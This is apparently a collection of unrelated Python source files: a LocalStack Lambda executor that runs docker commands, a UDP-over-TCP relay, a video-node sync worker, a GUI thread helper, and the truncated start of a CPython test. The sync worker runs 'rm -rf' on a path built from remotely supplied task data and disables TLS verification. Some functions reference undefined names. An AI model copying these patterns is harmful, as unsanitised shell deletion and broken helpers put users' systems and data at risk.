logs_client = aws_stack.connect_to_service('logs')
log_group_name = '/aws/lambda/%s' % func_details.name()
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time))
log_stream_name = '%s/[$LATEST]%s' % (time_str, short_uid())
# make sure that the log group exists
log_groups = logs_client.describe_log_groups()['logGroups']
log_groups = [lg['logGroupName'] for lg in log_groups]
if log_group_name not in log_groups:
try:
logs_client.create_log_group(logGroupName=log_group_name)
except Exception as e:
if 'ResourceAlreadyExistsException' in str(e):
# this can happen in certain cases, possibly due to a race condition
pass
else:
raise e
# create a new log stream for this lambda invocation
logs_client.create_log_stream(logGroupName=log_group_name, logStreamName=log_stream_name)
# store new log events under the log stream
invocation_time = invocation_time
finish_time = int(time.time() * 1000)
log_lines = log_output.split('\n')
time_diff_per_line = float(finish_time - invocation_time) / float(len(log_lines))
log_events = []
for i, line in enumerate(log_lines):
if not line:
continue
# simple heuristic: assume log lines were emitted in regular intervals
log_time = invocation_time + float(i) * time_diff_per_line
event = {'timestamp': int(log_time), 'message': line}
log_events.append(event)
if not log_events:
return
logs_client.put_log_events(
logGroupName=log_group_name,
logStreamName=log_stream_name,
logEvents=log_events
)
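        # Worked example of the timestamp heuristic above (illustrative numbers,
        # not from a real invocation): with invocation_time=1000, finish_time=1600
        # and 3 log lines, time_diff_per_line = (1600 - 1000) / 3 = 200.0, so the
        # lines get timestamps 1000, 1200 and 1400 -- i.e. they are spread evenly
        # across the measured execution window instead of all stamped at the end.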
def run_lambda_executor(self, cmd, event=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars,
stdin=True)
result, log_output = process.communicate(input=event)
result = to_str(result).strip()
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
(return_code, log_output))
return result, log_output
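# Illustrative sketch (not part of the original module): the minimal shape of a
# custom executor. A subclass only needs to implement _execute() and return a
# (result, log_output) tuple; execute() above then takes care of asynchronous
# dispatch and of forwarding the log output to CloudWatch Logs.
#
#   class LambdaExecutorEcho(LambdaExecutor):
#       def _execute(self, func_arn, func_details, event, context=None, version=None):
#           # pretend the function simply echoes its event back
#           return json.dumps(json_safe(event)), 'echo executor: invoked %s' % func_arn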
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
docker_host = config.DOCKER_HOST_FROM_CONTAINER
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if runtime == LAMBDA_RUNTIME_JAVA8:
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
command = ("bash -c 'cd %s; java %s -cp \".:`ls *.jar | tr \"\\n\" \":\"`\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.debug('Running lambda cmd: %s' % cmd)
result, log_output = self.run_lambda_executor(cmd, stdin, environment)
log_formatted = log_output.strip().replace('\n', '\n> ')
LOG.debug('Lambda %s result / log output:\n%s\n>%s' % (func_arn, result.strip(), log_formatted))
return result, log_output
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' --rm'
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' lambci/lambda:%s'
) % (docker_cmd, container_name, env_vars_str, network_str, runtime)
LOG.debug(cmd)
run(cmd)
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: lambci/lambda:%s' % runtime)
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' lambci/lambda:%s'
) % (docker_cmd, runtime)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
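        # For example (derived from the regex above), the ARN
        # "arn:aws:lambda:us-east-1:000000000000:function:my-func" maps to the
        # container name
        # "localstack_lambda_arn_aws_lambda_us-east-1_000000000000_function_my-func".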
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
docker_cmd = self._docker_cmd()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s'
' %s'
' %s'
' %s' # network
' --rm'
' "lambci/lambda:%s" %s'
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, runtime, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = self.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' --rm'
' "lambci/lambda:%s" %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string, network_str, runtime, command)
return cmd
def get_host_path_for_path_in_docker(self, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
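        # Example with illustrative values: if config.TMP_FOLDER is
        # "/tmp/localstack" (inside the LocalStack container) and
        # config.HOST_TMP_FOLDER is "/home/user/.localstack" (on the host),
        # then a lambda_cwd of "/tmp/localstack/zipfile.abc123" is rewritten to
        # "/home/user/.localstack/zipfile.abc123" so the host's Docker daemon
        # can mount it into the Lambda container.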
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# TODO: Interweaving stdout/stderr currently not supported
log_output = ''
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
return result, log_output
def execute_java_lambda(self, event, context, handler, main_file):
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
result, log_output = self.run_lambda_executor(cmd)
LOG.debug('Lambda result / log output:\n%s\n> %s' % (
result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
return opts
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_LOCAL
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
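# Illustrative sketch (not part of the original module): how an executor is
# expected to be looked up from this registry, assuming the LAMBDA_EXECUTOR
# config value referenced above is one of 'local', 'docker' or 'docker-reuse'
# (func_arn and func_details are placeholders here):
#
#   executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
#   executor.startup()
#   result, log_output = executor.execute(func_arn, func_details, event={'foo': 'bar'})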
|
client.py
|
import socket
from threading import Thread
import config
from utils import recv, log, info, spawn
class Client:
def __init__(self):
        self.c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP socket for the local game client
self.c.bind(config.client_listen_addr)
self.game_addr = None
def relay(self, tcp_conn, udp_conn):
while True:
data = recv(tcp_conn)
log('server -> local:', data)
if data is None:
tcp_conn.close()
return
udp_conn.sendto(data, self.game_addr)
def run(self):
s = socket.socket()
s.connect(config.server_listen_addr)
# t = Thread(target=self.relay, args=(s, self.c))
# t.setDaemon(True)
# t.start()
spawn(target=self.relay, args=(s, self.c))
while True:
data, self.game_addr = self.c.recvfrom(4096)
log('local -> server:', data)
s.sendall(str(len(data)).encode() + b'\n' + data)
def supervisor(self):
info('UDP Over TCP Client start on', config.client_listen_addr)
while True:
t = spawn(target=self.run)
t.join()
info('Reconnect...')
def main():
c = Client()
c.supervisor()
if __name__ == '__main__':
main()
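# Illustrative sketch (assumed, not shown in this file): the imported "config"
# module only needs to provide the two addresses referenced above, e.g.:
#
#   client_listen_addr = ('127.0.0.1', 27015)    # local UDP endpoint the game talks to
#   server_listen_addr = ('203.0.113.10', 9000)  # remote TCP relay server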
|
vms_async_slave.py
|
# coding: utf-8
#------------------------------
# Scheduled tasks
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
import base64
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
sys.path.append(os.getcwd() + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import requests
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isDEmpty(data):
if len(data) > 0:
return False
return True
#------------Private Methods--------------
#------------Public Methods--------------
def download(url, file_path):
    # the first request is only used to read the total file size
    r1 = requests.get(url, stream=True, verify=False)
    total_size = int(r1.headers['Content-Length'])
    # important: check how much of the file has already been downloaded locally
    if os.path.exists(file_path):
        temp_size = os.path.getsize(file_path)  # size of the partially downloaded local file
    else:
        temp_size = 0
    # show how much has been downloaded so far
    print(temp_size)
    print(total_size)
    # core part: ask the server to continue from the bytes we already have
    headers = {'Range': 'bytes=%d-' % temp_size}
    # request the url again, this time with the Range header attached
    r = requests.get(url, stream=True, verify=False, headers=headers)
    # note the "ab" mode below: the file is opened for appending,
    # so the resumed chunks are written after the existing data
    with open(file_path, "ab") as f:
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                temp_size += len(chunk)
                f.write(chunk)
                f.flush()
                # render a simple progress bar for the download
                done = int(50 * temp_size / total_size)
                sys.stdout.write("\r[%s%s] %d%%" % (
                    '█' * done, ' ' * (50 - done), 100 * temp_size / total_size))
                sys.stdout.flush()
    print()  # move past the trailing \r carriage return
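# Illustrative usage of the resumable download above (URL and path are
# hypothetical):
#
#   download('http://master-node/v/demo/demo.mp4', '/data/app/demo/demo.mp4')
#
# If the local file already holds N bytes, the Range header requests
# 'bytes=N-' and the remaining data is appended, so an interrupted transfer
# resumes instead of restarting from zero.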
def isNeedAsync():
_list = common.M('node').where(
'ismaster=?', (1,)).select()
run_model = common.M('kv').field('id,name,value').where(
'name=?', ('run_model',)).select()
# print(run_model[0]['value'], len(_list))
if run_model[0]['value'] == '2' and len(_list) >= 1:
return True
return False
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
def getNodeList(ismaster=1):
_list = common.M('node').field('id,info,port,name,ip').where(
'ismaster=?', (ismaster,)).select()
return _list
def getTaskList(ismaster=0, status=0, action=1):
_list = common.M('task').field('id,ismaster,mark,sign,vid,status,action,uptime,addtime').where(
'ismaster=? and status=? and action=?', (ismaster, status, action)).limit('1').select()
return _list
def getMasterNodeURL():
_list = getNodeList()
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
return _url
def postNode(_list):
ret = common.httpPost(api_url, {
'source': {
"name": common.getSysKV('run_mark'),
"ip": common.getLocalIp(),
"port": common.readFile('data/port.pl'),
"ismaster": common.getSysKV('run_is_master')
},
'name': _list[0]['name']
})
retDic = json.loads(ret)
#------------Public Methods--------------
def asyncNodeInfo():
sleep_time = 20
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) < 1:
time.sleep(sleep_time)
continue
print("async Node info !!! start")
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/node"
ret = common.httpPost(api_url, {
'source': {
"name": common.getSysKV('run_mark'),
"ip": common.getLocalIp(),
"port": common.readFile('data/port.pl'),
"ismaster": common.getSysKV('run_is_master')
},
'name': _list[0]['name']
})
retDic = json.loads(ret)
if retDic['code'] == 0:
nodeM = common.M('node')
for i in retDic['data']:
dataList = nodeM.field('name,ip,port,ismaster').where(
'name=?', (i['name'],)).select()
if len(dataList) < 1:
r = nodeM.add("name,ip,port,info,ismaster,uptime,addtime",
(i['name'], i['ip'], i['port'], i['info'], i['ismaster'], common.getDate(), common.getDate()))
if r > 0:
print("node add ok")
else:
r = nodeM.where('name=?', (i['name'],)).save('ip,port,info,ismaster,uptime', (i[
'ip'], i['port'], i['info'], i['ismaster'], common.getDate()))
if r > 0:
print("node update ok")
print("async Node info !!! end")
time.sleep(sleep_time)
def asyncVideoDBData():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
        # check whether the async change notification has fired
video_db_ischange = common.getSysKV('video_db_ischange')
if video_db_ischange == '0':
time.sleep(sleep_time)
continue
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) < 1:
time.sleep(sleep_time)
continue
print('async VideoDB!!!')
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/videoDbInfo"
pageInfo = common.httpPost(api_url)
pageInfo = json.loads(pageInfo)
pageSize = 1024
pageNum = int(pageInfo['data']) / pageSize
# print(pageNum, pageInfo['data'])
api_range_url = _url + "/async_master_api/videoDbRange"
common.writeFileClear('data/tmp.db')
for x in xrange(0, pageNum):
start = x * pageSize
data = common.httpPost(api_range_url, {
'start': start,
'slen': pageSize,
})
data = json.loads(data)
fdata = base64.b64decode(data['data'])
common.writeFileAppend('data/tmp.db', fdata)
tmpMd5 = common.calMD5ForFile('data/tmp.db')
videoMd5 = common.calMD5ForFile('data/video.db')
if tmpMd5 != videoMd5:
os.remove('data/video.db')
os.rename('data/tmp.db', 'data/video.db')
print('async VideoDB ok!!!')
common.setSysKV('video_db_ischange', '0')
time.sleep(sleep_time)
def videoDownload(url, pos):
# print(pos, url)
fdir = os.path.dirname(pos)
if not os.path.exists(fdir):
common.mkdir(fdir)
c = common.httpGet(url)
common.writeFile(pos, c)
def asyncVideoFile():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
task_list = getTaskList(0, 0)
if len(task_list) < 1:
time.sleep(sleep_time)
continue
url = getMasterNodeURL()
print('async VideoFile!!!')
api_url = url + "/async_master_api/fileList"
ret = common.httpPost(api_url, {
'vid': task_list[0]['vid'],
'name': task_list[0]['mark']
})
if ret:
r = json.loads(ret)
if r['code'] != 0:
print(r['msg'])
continue
for i in r['data']:
file_url = url + '/' + i.replace('app', 'v')
videoDownload(file_url, i)
common.M('task').where(
'id=?', (task_list[0]['id'],)).setField('status', 1)
time.sleep(sleep_time)
def asyncVideoFileDel():
sleep_time = 20
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
        task_list = getTaskList(0, 0, 2)
if len(task_list) < 1:
time.sleep(sleep_time)
continue
print('async asyncVideoFileDel!!!')
sign = task_list[0]['sign']
filename = sign.split('|')[1]
pathfile = os.getcwd() + "/app/" + filename
if os.path.exists(pathfile):
common.execShell('rm -rf ' + pathfile)
if os.path.exists(pathfile):
del_file(pathfile)
os.removedirs(pathfile)
common.M('task').where(
'id=?', (task_list[0]['id'],)).setField('status', 1)
time.sleep(sleep_time)
def asyncTaskCallBack():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
        task_list = common.M('task').field('id,ismaster,mark,sign,vid,status,action,uptime,addtime').where(
            'ismaster=? and status=?', (0, 1)).limit('1').select()
if len(task_list) < 1:
time.sleep(sleep_time)
continue
print('async asyncTask Callback!!!')
for x in xrange(0, len(task_list)):
url = getMasterNodeURL()
api_url = url + "/async_master_api/asyncTaskCallBack"
ret = common.httpPost(api_url, {
'mark': common.getSysKV('run_mark'),
'name': task_list[x]['mark'],
'vid': task_list[x]['vid'],
'action': task_list[x]['action'],
})
data = json.loads(ret)
if data['code'] != 0:
print(data['msg'])
else:
common.M('task').where(
'id=?', (task_list[x]['id'],)).setField('status', 2)
time.sleep(sleep_time)
def startTask():
    # keep the main thread alive; on any interruption, wait a bit and restart
    try:
        while True:
            time.sleep(2)
    except Exception:
        time.sleep(60)
        startTask()
if __name__ == "__main__":
    # sync node data
t = threading.Thread(target=asyncNodeInfo)
t.setDaemon(True)
t.start()
    # full sync (video database)
t = threading.Thread(target=asyncVideoDBData)
t.setDaemon(True)
t.start()
    # sync files
t = threading.Thread(target=asyncVideoFile)
t.setDaemon(True)
t.start()
    # sync file deletions
t = threading.Thread(target=asyncVideoFileDel)
t.setDaemon(True)
t.start()
    # callback when file sync completes
t = threading.Thread(target=asyncTaskCallBack)
t.setDaemon(True)
t.start()
startTask()
|
dispatch.py
|
import threading
import Queue
import traceback
def request_results(func, args=(), kwargs={}):
# prepare request
results = Queue.Queue()
func_args = (args, kwargs)
instruct = func, func_args, results
# ask the thread
worker = threading.Thread(target=_compute_results_, args=instruct)
worker.daemon = True
worker.start()
# return the empty results, it is up to the GUI to wait for it
return results
def after_completion(window, queue, func):
def check():
try:
result = queue.get(block=False)
        except Queue.Empty:
window.after(1000, check)
else:
func(result)
window.after(100, check)
def _compute_results_(func, func_args, results):
"""
This is where the actual work is done,
and is run entirely in the new worker thread.
"""
args, kwargs = func_args
    try:
        _results = func(*args, **kwargs)
    except Exception:
        # hand the formatted traceback back to the GUI thread as the "result"
        _results = Exception(traceback.format_exc())
    results.put(_results)
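# Illustrative sketch (not part of the original module): typical use from a
# Tkinter GUI, where slow_task and on_done are hypothetical application
# callables. request_results() runs the work in a daemon thread and
# after_completion() polls the queue without blocking the event loop:
#
#   import Tkinter
#   root = Tkinter.Tk()
#   pending = request_results(slow_task, args=(42,))
#   after_completion(root, pending, on_done)
#   root.mainloop()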
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
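# Illustrative sketch (not part of the test suite): how the two helpers above
# combine -- the script's stdout is redirected into a pipe inside the target
# subinterpreter and read back in the main interpreter:
#
#   interp = interpreters.create()
#   out = _run_output(interp, "print('hi')")
#   assert out.strip() == 'hi'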
def _wait_for_interp_to_run(interp, timeout=None):
    # bpo-37224: Running this test file in multiple processes can fail randomly.
